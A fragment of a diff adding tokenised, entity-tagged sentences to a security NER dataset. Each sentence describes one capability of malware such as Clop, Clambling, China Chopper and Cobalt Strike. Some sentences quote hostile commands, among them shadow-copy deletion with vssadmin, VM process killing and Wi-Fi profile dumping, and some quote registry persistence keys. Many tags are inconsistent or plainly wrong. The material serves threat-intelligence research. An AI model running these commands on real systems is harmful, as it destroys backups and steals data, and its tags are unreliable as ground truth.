"a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "remove", + "persistence-related", + "artifacts", + "from", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "use", + "PowerShell", + "for", + "payload", + "execution", + "and", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "has", + "the", + "ability", + "to", + "list", + "running", + "processes", + "through", + "the", + "use", + "of", + "`tasklist`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "has", + "the", + "ability", + "to", + "enumerate", + "`Uninstall`", + "registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "has", + "the", + "ability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "list", + "the", + "installed", + "applications", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "send", + "additional", + "modules", + "over", + "C2", + "encoded", + "with", + "base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "send", + "additional", + "modules", + "over", + "C2", + "encrypted", + "with", + "a", + "simple", + "substitution", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "enumerate", + "the", + "OS", + "version", + "and", + "computer", + "name", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "has", + "the", + "ability", + "to", + "use", + "<code>ipconfig</code>", + "to", + "enumerate", + "system", + "network", + "settings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "use", + "`netsh", + "wlan", + "show", + "profiles`", + "to", + "list", + "specific", + "Wi-Fi", + "profile", + "details." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "use", + "HTTP", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "download", + "additional", + "modules", + "from", + "actor-controlled", + "Amazon", + "S3", + "buckets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "C#", + "implementation", + "of", + "the", + "CharmPower", + "command", + "execution", + "module", + "can", + "use", + "<code>cmd</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "use", + "`wmic`", + "to", + "gather", + "information", + "from", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cheerscrypt", + "can", + "encrypt", + "data", + "on", + "victim", + "machines", + "using", + "a", + "Sosemanuk", + "stream", + "cipher", + "with", + "an", + "Elliptic-curve", + "Diffie–Hellman", + "(ECDH)", + "generated", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cheerscrypt", + "can", + "search", + "for", + "log", + "and", + "VMware-related", + "files", + "with", + ".log,", + ".vmdk,", + ".vmem,", + ".vswp,", + "and", + ".vmsn", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Cheerscrypt", + "has", + "the", + "ability", + "to", + "terminate", + "VM", + "processes", + "on", + "compromised", + "hosts", + "through", + "execution", + "of", + "`esxcli", + "vm", + "process", + "kill`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "variants", + "of", + "Cherry", + "Picker", + "use", + "AppInit_DLLs", + "to", + "achieve", + "persistence", + "by", + "creating", + "the", + "following", + "Registry", + "key:", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows", + "\"AppInit_DLLs\"=\"pserver32.dll\"</code>" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Cherry", + "Picker", + "exfiltrates", + "files", + "over", + "FTP." + ], + "ner_tags": [ + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Recent", + "versions", + "of", + "Cherry", + "Picker", + "delete", + "files", + "and", + "registry", + "keys", + "created", + "by", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-Tool", + "B-SecTeam", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "upload", + "local", + "files." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "list", + "directory", + "contents." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "download", + "remote", + "files." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "spider", + "authentication", + "portals." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "perform", + "brute", + "force", + "password", + "guessing", + "against", + "authentication", + "portals." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "client", + "component", + "is", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "can", + "change", + "the", + "timestamp", + "of", + "files." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "executes", + "code", + "sent", + "via", + "HTTP", + "POST", + "commands." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "is", + "a", + "Web", + "Shell", + "payload." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "China", + "Chopper's", + "server", + "component", + "is", + "capable", + "of", + "opening", + "a", + "command", + "terminal." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chinoxy", + "can", + "use", + "a", + "digitally", + "signed", + "binary", + "(\"Logitech", + "Bluetooth", + "Wizard", + "Host", + "Process\")", + "to", + "load", + "its", + "dll", + "into", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Chinoxy", + "dropping", + "function", + "can", + "initiate", + "decryption", + "of", + "its", + "config", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chinoxy", + "has", + "encrypted", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chinoxy", + "has", + "used", + "the", + "name", + "`eoffice.exe`", + "in", + "attempt", + "to", + "appear", + "as", + "a", + "legitimate", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chinoxy", + "has", + "established", + "persistence", + "via", + "the", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "registry", + "key", + "and", + "by", + "loading", + "a", + "dropper", + "to", + "`(%COMMON_", + "STARTUP%\\\\eoffice.exe)`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "encrypt", + "and", + "store", + "on", + "disk", + "collected", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "collect", + "data", + "from", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "decrypt", + "its", + "encrypted", + "internal", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "encrypt", + "sections", + "of", + "its", + "code", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "exfiltrate", + "collected", + "data", + "via", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "download", + "its", + "code", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "store", + "captured", + "system", + "information", + "locally", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "use", + "Windows", + "API", + "including", + "`WinExec`", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "set", + "itself", + "to", + "sleep", + "before", + "requesting", + "a", + "new", + "command", + "from", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "has", + "the", + "ability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Chrommme", + "has", + "the", + "ability", + "to", + "list", + "drives", + "and", + "obtain", + "the", + "computer", + "name", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "enumerate", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chrommme", + "can", + "retrieve", + "the", + "username", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "use", + "Telnet", + "for", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "use", + "Dropbox", + "to", + "download", + "malicious", + "payloads,", + "send", + "commands,", + "and", + "receive", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "I-Features", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "bypass", + "UAC", + "using", + "a", + "`passuac.dll`", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "capture", + "and", + "store", + "clipboard", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "store", + "a", + "file", + "named", + "`mpsvc.dll`,", + "which", + "opens", + "a", + "malicious", + "`mpsvc.mui`", + "file,", + "in", + "the", + "same", + "folder", + "as", + "the", + "legitimate", + "Microsoft", + "executable", + "`MsMpEng.exe`", + "to", + "gain", + "execution." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "deobfuscate", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "send", + "files", + "from", + "a", + "victim's", + "machine", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "browse", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "set", + "its", + "file", + "attributes", + "to", + "hidden." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "capture", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "gained", + "execution", + "through", + "luring", + "victims", + "into", + "opening", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "set", + "and", + "delete", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "use", + "TCP", + "and", + "UDP", + "for", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "The", + "Clambling", + "executable", + "has", + "been", + "obfuscated", + "when", + "dropped", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Clambling", + "dropper", + "can", + "use", + "PowerShell", + "to", + "download", + "the", + "malware." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "enumerate", + "processes", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "execute", + "binaries", + "through", + "process", + "hollowing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "inject", + "into", + "the", + "`svchost.exe`", + "process", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "enumerate", + "Registry", + "keys,", + "including", + "<code>KEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir</code>", + "to", + "search", + "for", + "a", + "bitcoin", + "wallet." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "establish", + "persistence", + "by", + "adding", + "a", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "create", + "and", + "start", + "services", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "been", + "delivered", + "to", + "victim's", + "machines", + "through", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "discover", + "the", + "hostname,", + "computer", + "name,", + "and", + "Windows", + "version", + "of", + "a", + "targeted", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "enumerate", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "determine", + "the", + "current", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "wait", + "30", + "minutes", + "before", + "initiating", + "contact", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "record", + "screen", + "content", + "in", + "AVI", + "format." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "has", + "the", + "ability", + "to", + "communicate", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "use", + "cmd.exe", + "for", + "command", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clambling", + "can", + "register", + "itself", + "as", + "a", + "system", + "service", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "use", + "code", + "signing", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "encrypt", + "files", + "using", + "AES,", + "RSA,", + "and", + "RC4", + "and", + "will", + "add", + "the", + "\".clop\"", + "extension", + "to", + "encrypted", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "B-Way", + "B-Way", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "used", + "a", + "simple", + "XOR", + "operation", + "to", + "decrypt", + "strings." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "uninstall", + "or", + "disable", + "security", + "products." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "searched", + "folders", + "and", + "subfolders", + "for", + "files", + "to", + "encrypt." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "delete", + "the", + "shadow", + "volumes", + "with", + "<code>vssadmin", + "Delete", + "Shadows", + "/all", + "/quiet</code>", + "and", + "can", + "use", + "bcdedit", + "to", + "disable", + "recovery", + "options." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "make", + "modifications", + "to", + "Registry", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "use", + "msiexec.exe", + "to", + "disable", + "security", + "tools", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "used", + "built-in", + "API", + "functions", + "such", + "as", + "WNetOpenEnumW(),", + "WNetEnumResourceW(),", + "WNetCloseEnum(),", + "GetProcAddress(),", + "and", + "VirtualAlloc()." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Clop", + "can", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "enumerate", + "all", + "processes", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "search", + "for", + "processes", + "with", + "antivirus", + "and", + "antimalware", + "product", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "kill", + "several", + "processes", + "and", + "services", + "related", + "to", + "backups", + "and", + "security", + "solutions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "been", + "packed", + "to", + "help", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "checked", + "the", + "keyboard", + "language", + "using", + "the", + "GetKeyboardLayout()", + "function", + "to", + "avoid", + "installation", + "on", + "Russian-language", + "or", + "other", + "Commonwealth", + "of", + "Independent", + "States-language", + "machines;", + "it", + "will", + "also", + "check", + "the", + "<code>GetTextCharset</code>", + "function." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "has", + "used", + "the", + "<code>sleep</code>", + "command", + "to", + "avoid", + "sandbox", + "detection." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clop", + "can", + "use", + "cmd.exe", + "to", + "help", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "variant", + "of", + "CloudDuke", + "uses", + "a", + "Microsoft", + "OneDrive", + "account", + "to", + "exchange", + "commands", + "and", + "stolen", + "data", + "with", + "its", + "operators." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CloudDuke", + "downloads", + "and", + "executes", + "additional", + "malware", + "from", + "either", + "a", + "Web", + "address", + "or", + "a", + "Microsoft", + "OneDrive", + "account." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "variant", + "of", + "CloudDuke", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "RSA", + "asymmetric", + "encryption", + "with", + "PKCS1", + "padding", + "to", + "encrypt", + "data", + "sent", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "download", + "a", + "hosted", + "\"beacon\"", + "payload", + "using", + "BITSAdmin." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + 